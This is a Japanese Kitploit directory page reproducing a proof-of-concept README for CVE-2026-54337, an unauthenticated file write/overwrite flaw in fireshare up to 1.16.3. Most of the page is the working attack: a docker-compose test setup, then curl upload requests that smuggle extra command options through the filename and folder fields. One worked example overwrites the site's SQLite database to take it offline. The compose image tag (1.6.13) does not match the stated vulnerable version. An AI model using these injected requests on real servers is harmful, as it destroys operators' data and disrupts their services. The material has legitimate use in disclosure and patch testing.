Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - fireshare <= 1.16.3 向けの認証なしファイル書き込み/上書きのPoC | Kitploit
ツール/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - fireshare <= 1.16.3 向けの認証なしファイル書き込み/上書きのPoC

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-54337 PoC

CVE-2026-54337 - fireshare <= 1.16.3 における未認証のファイル書き込み/上書き PoC

詳細については、このGitHub勧告を参照してください。

セットアップ

  • テストには以下の docker-compose.yml を使用してください。
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

エクスプロイト

  • Step 1: .mp4 拡張子で名前を付けた任意のファイルを作成してください。例:
root@kitploit:~
$ echo 123 > test.mp4
  • Step 2: 以下のcurlコマンドを実行してください(プレースホルダーを必ず変更してください
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

例えば、/data/db.sqlite を上書きするには、次のようにコマンドを変更します。

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

注意

  • デフォルトでは、サービスは nginx ユーザーで実行され、 /data, /processed, /images, /videos にのみアクセスできるため、書き込み/上書きが可能なのはこれらのディレクトリのみです。
  • そのため、私の考えでは、/data/db.sqlite を上書きすることが最も影響が大きく、ウェブサイトが使用不能になります。

免責事項

  • この概念実証(PoC)は、教育、研究、および防御的なセキュリティ目的のみで提供されます。
  • 著者は、このコードの使用に起因するいかなる誤用、損害、不正アクセス、サービス中断、データ損失、または法的結果について責任を負いません。ユーザーは、このPoCを使用する前に、すべての適用される法律、規制、および許可要件を遵守することを単独で保証する責任があります。
  • このPoCは、明示的なテスト許可があるシステムに対してのみ実行されるべきです。無許可のシステムテストは違法かつ非倫理的である可能性があります。
  • このソフトウェアを使用することにより、自己責任で使用することを認めたものとします。
ツールをダウンロード